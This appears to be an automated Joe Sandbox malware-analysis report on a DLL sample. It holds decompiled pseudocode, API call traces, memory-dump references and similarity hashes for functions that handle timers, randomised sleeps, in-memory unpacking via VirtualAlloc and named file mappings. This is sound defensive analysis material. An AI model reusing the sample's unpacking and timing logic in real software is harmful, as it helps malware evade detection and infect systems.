                                                                                                                                                                                                                                    0x02f9af0a
                                                                                                                                                                                                                                    0x02f9af1a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af20
                                                                                                                                                                                                                                    0x02f9af01
                                                                                                                                                                                                                                    0x02f9af05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af05
                                                                                                                                                                                                                                    0x02f9aed2
                                                                                                                                                                                                                                    0x02f9aed6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9aed6
                                                                                                                                                                                                                                    0x02f9aeaf
                                                                                                                                                                                                                                    0x02f9aeb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

APIs
• RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02F9AE5E
• LoadLibraryA.KERNELBASE(?), ref: 02F9AEDB
• GetLastError.KERNEL32 ref: 02F9AEE7
• RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02F9AF1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
Similarity
• API ID: ExceptionRaise$ErrorLastLibraryLoad
• String ID: $
• API String ID: 948315288-3993045852
• Opcode ID: f6ffc47bd3245c688a502c99ffd70b86f2a1832bd82585d3bca23ee3767d86bc
• Instruction ID: fb7e467614a17484d173725253bbf894063cc581fe16e0c805143e9c3132fa64
• Opcode Fuzzy Hash: f6ffc47bd3245c688a502c99ffd70b86f2a1832bd82585d3bca23ee3767d86bc
• Instruction Fuzzy Hash: 6D813CB2E402099FEF14DFA9D884BADB7F5EB48788F10842AEA15D7250E770E945CF50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                    control_flow_graph 139 2f96786-2f967b2 memset CreateWaitableTimerA 140 2f967b8-2f96808 _allmul SetWaitableTimer WaitForMultipleObjects 139->140 141 2f96913-2f96919 GetLastError 139->141 142 2f9680a-2f9680d 140->142 143 2f96883-2f96888 140->143 144 2f9691c-2f96923 141->144 145 2f96818 142->145 146 2f9680f call 2f973fd 142->146 147 2f96889-2f9688d 143->147 151 2f96822 145->151 152 2f96814-2f96816 146->152 149 2f9689d-2f968a1 147->149 150 2f9688f-2f96897 HeapFree 147->150 149->147 153 2f968a3-2f968ac CloseHandle 149->153 150->149 154 2f96825-2f96829 151->154 152->145 152->151 153->144 155 2f9683b-2f96864 call 2f98504 154->155 156 2f9682b-2f96832 154->156 160 2f968ae-2f968b3 155->160 161 2f96866-2f9686f 155->161 156->155 157 2f96834 156->157 157->155 162 2f968d2-2f968da 160->162 163 2f968b5-2f968bb 160->163 161->154 164 2f96871-2f96880 call 2f93bf1 161->164 166 2f968e0-2f96908 _allmul SetWaitableTimer WaitForMultipleObjects 162->166 163->143 165 2f968bd-2f968d0 call 2f9a1b0 163->165 164->143 165->166 166->154 169 2f9690e 166->169 169->143
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E02F96786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				struct %anon52 _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                    				void _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				struct %anon52 _t46;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				long _t53;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				struct %anon52 _t60;
                                                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                    				void** _t78;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t73 = __edx;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                    				_v44 = _t46;
                                                                                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                                                                                    					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                    					_push(0xff676980);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push( *0x2f9d240);
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L02F9B0C8();
                                                                                                                                                                                                                                    					_v36.LowPart = _t46;
                                                                                                                                                                                                                                    					_v32 = _t73;
                                                                                                                                                                                                                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                    					_t51 =  *0x2f9d26c; // 0x344
                                                                                                                                                                                                                                    					_v40 = _t51;
                                                                                                                                                                                                                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8.LowPart = _t53;
                                                                                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x2f9d24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t68 = E02F973FD(_t73); // executed
                                                                                                                                                                                                                                    							if(_t68 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x2f9d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t71 = _v12;
                                                                                                                                                                                                                                    						_t58 = _t71 << 4;
                                                                                                                                                                                                                                    						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t72 = _t71 + 1;
                                                                                                                                                                                                                                    						_v24 = _t71 + 1;
                                                                                                                                                                                                                                    						_t60 = E02F98504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                    						_v8.LowPart = _t60;
                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t65 = _v24;
                                                                                                                                                                                                                                    						_t90 = _t65 - 3;
                                                                                                                                                                                                                                    						_v12 = _t65;
                                                                                                                                                                                                                                    						if(_t65 != 3) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8.LowPart = E02F93BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                    						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *0x2f9d244);
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags =  *0x2f9d248; // 0x0
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t60 = E02F9A1B0();
                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push( *0x2f9d248);
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								L02F9B0C8();
                                                                                                                                                                                                                                    								_v36.LowPart = _t60;
                                                                                                                                                                                                                                    								_v32 = _t76;
                                                                                                                                                                                                                                    								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                    								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    								__eflags = _t64;
                                                                                                                                                                                                                                    								_v8.LowPart = _t64;
                                                                                                                                                                                                                                    								if(_t64 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t78 =  &_v92;
                                                                                                                                                                                                                                    					_t70 = 3;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t54 =  *_t78;
                                                                                                                                                                                                                                    						if(_t54 != 0) {
                                                                                                                                                                                                                                    							HeapFree( *0x2f9d238, 0, _t54);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                    						_t70 = _t70 - 1;
                                                                                                                                                                                                                                    					} while (_t70 != 0);
                                                                                                                                                                                                                                    					CloseHandle(_v44);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9679B
                                                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02F967A7
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02F967CC
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02F967E8
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02F96801
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F96897
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F968A6
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02F968E0
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02F92417,?), ref: 02F968F6
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02F96901
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033E9388,00000000,?,76D7F710,00000000,76D7F730), ref: 02F9744C
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033E93C0,?,00000000,30314549,00000014,004F0053,033E937C), ref: 02F974E9
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F96814), ref: 02F974FB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F96913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                                                    • Opcode ID: f51221c3d190e23e875480da0d3f8fb19d806e74cd56229e3258cc621c2112eb
                                                                                                                                                                                                                                    • Instruction ID: 30e07894d73da4640c8e200dbbfeeed1e4a1364e485e2c03cead120919b0f4f5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f51221c3d190e23e875480da0d3f8fb19d806e74cd56229e3258cc621c2112eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5512971C01229AAEF10AF95DC44EEEBFBDEF497A4F204616EA10E2190D7709654CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 172 40163f-401652 call 401850 175 401740-401742 172->175 176 401658 172->176 177 401659-401690 GetSystemTime SwitchToThread call 4018f4 Sleep 176->177 180 401692-401694 177->180 181 40169a-40169e 180->181 182 40173f 180->182 183 4016a0-4016ab call 401538 181->183 184 4016ef-40170a call 4012dc 181->184 182->175 189 4016e9 183->189 190 4016ad-4016bf GetLongPathNameW 183->190 191 401730-401732 GetLastError 184->191 192 40170c-40171a WaitForSingleObject 184->192 189->184 194 4016e1-4016e7 190->194 195 4016c1-4016d2 call 401de1 190->195 193 401735-40173b 191->193 196 401727-40172e CloseHandle 192->196 197 40171c-401721 GetExitCodeThread 192->197 193->182 198 40173d GetLastError 193->198 194->184 195->194 201 4016d4-4016da GetLongPathNameW call 401dfc 195->201 196->193 197->196 198->182 203 4016df 201->203 203->184
                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                    			E0040163F(char _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v24;
                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				long _t20;
                                                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                    				long _t30;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t20 = E00401850();
                                                                                                                                                                                                                                    				_v8 = _t20;
                                                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                                                    					return _t20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					GetSystemTime( &_v24);
                                                                                                                                                                                                                                    					_t22 = SwitchToThread();
                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                    					_t44 = 9;
                                                                                                                                                                                                                                    					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                                                                                                                                                                                                                                    					_t25 = E004018F4(0, _t51); // executed
                                                                                                                                                                                                                                    					_v8 = _t25;
                                                                                                                                                                                                                                    					Sleep(_t51 << 5); // executed
                                                                                                                                                                                                                                    					_t26 = _v8;
                                                                                                                                                                                                                                    				} while (_t26 == 0xc);
                                                                                                                                                                                                                                    				if(_t26 != 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t26;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_t54 = E004012DC(E0040135A,  &_v48);
                                                                                                                                                                                                                                    					if(_t54 == 0) {
                                                                                                                                                                                                                                    						_v8 = GetLastError();
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                                                                                                                                                                                                    						_v8 = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							GetExitCodeThread(_t54,  &_v8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						CloseHandle(_t54);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v8;
                                                                                                                                                                                                                                    					if(_t26 == 0xffffffff) {
                                                                                                                                                                                                                                    						_t26 = GetLastError();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E00401538(_t44,  &_a4) != 0) {
                                                                                                                                                                                                                                    					 *0x404138 = 0;
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = _a4;
                                                                                                                                                                                                                                    				_t55 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                    				_t36 =  *_t55(_t43, 0, 0); // executed
                                                                                                                                                                                                                                    				_t48 = _t36;
                                                                                                                                                                                                                                    				if(_t48 == 0) {
                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                    					 *0x404138 = _t43;
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t14 = _t48 + 2; // 0x2
                                                                                                                                                                                                                                    				_t38 = E00401DE1(_t48 + _t14);
                                                                                                                                                                                                                                    				 *0x404138 = _t38;
                                                                                                                                                                                                                                    				if(_t38 == 0) {
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_t55(_t43, _t38, _t48); // executed
                                                                                                                                                                                                                                    				E00401DFC(_t43);
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    0x0040171a
                                                                                                                                                                                                                                    0x00401721
                                                                                                                                                                                                                                    0x00401721
                                                                                                                                                                                                                                    0x00401728
                                                                                                                                                                                                                                    0x00401728
                                                                                                                                                                                                                                    0x00401735
                                                                                                                                                                                                                                    0x0040173b
                                                                                                                                                                                                                                    0x0040173d
                                                                                                                                                                                                                                    0x0040173d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040173b
                                                                                                                                                                                                                                    0x004016ab
                                                                                                                                                                                                                                    0x004016e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016e9
                                                                                                                                                                                                                                    0x004016ad
                                                                                                                                                                                                                                    0x004016b0
                                                                                                                                                                                                                                    0x004016b9
                                                                                                                                                                                                                                    0x004016bb
                                                                                                                                                                                                                                    0x004016bf
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x004016c1
                                                                                                                                                                                                                                    0x004016c6
                                                                                                                                                                                                                                    0x004016cd
                                                                                                                                                                                                                                    0x004016d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016d7
                                                                                                                                                                                                                                    0x004016da
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,76D263F0), ref: 0040185F
                                                                                                                                                                                                                                      • Part of subcall function 00401850: GetVersion.KERNEL32 ref: 0040186E
                                                                                                                                                                                                                                      • Part of subcall function 00401850: GetCurrentProcessId.KERNEL32 ref: 00401885
                                                                                                                                                                                                                                      • Part of subcall function 00401850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,00000000,76D263F0), ref: 0040165D
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401663
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 00401684
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016B9
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016D7
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170F
                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401721
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401728
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00401730
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040173D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                    • Opcode ID: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                                                                                                                                                                                                    • Instruction ID: 3c547408fdc9ceb87cb50058a61b233f89e190b219f0f48a38aaaf96b39e067b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31A272901214ABCB10EFA59D8499F7ABDEF84351B14463BF901F32A0E738DA409B69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F91B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				struct _FILETIME* _v12;
                                                                                                                                                                                                                                    				short _v56;
                                                                                                                                                                                                                                    				struct _FILETIME* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t27 = __edx;
                                                                                                                                                                                                                                    				_t12 =  &_v12;
                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                    				L02F9B0C2();
                                                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                                                    				_t13 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t5 = _t13 + 0x2f9e862; // 0x33e8e0a
                                                                                                                                                                                                                                    				_t6 = _t13 + 0x2f9e59c; // 0x530025
                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                    				_push( &_v56);
                                                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                                                    				L02F9AD5A();
                                                                                                                                                                                                                                    				_t17 = CreateFileMappingW(0xffffffff, 0x2f9d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                    				_t30 = _t17;
                                                                                                                                                                                                                                    				if(_t30 == 0) {
                                                                                                                                                                                                                                    					_t28 = GetLastError();
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							_t28 = GetLastError();
                                                                                                                                                                                                                                    							if(_t28 != 0) {
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = _t30;
                                                                                                                                                                                                                                    							 *_a8 = _t21;
                                                                                                                                                                                                                                    							_t28 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t28 = 2;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						CloseHandle(_t30);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t28;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53,?,?), ref: 02F91B3B
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02F91B51
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 02F91B76
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,02F9D2A8,00000004,00000000,00001000,?), ref: 02F91B92
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53), ref: 02F91BA4
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02F91BBB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?), ref: 02F91BDC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53), ref: 02F91BE4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1814172918-0
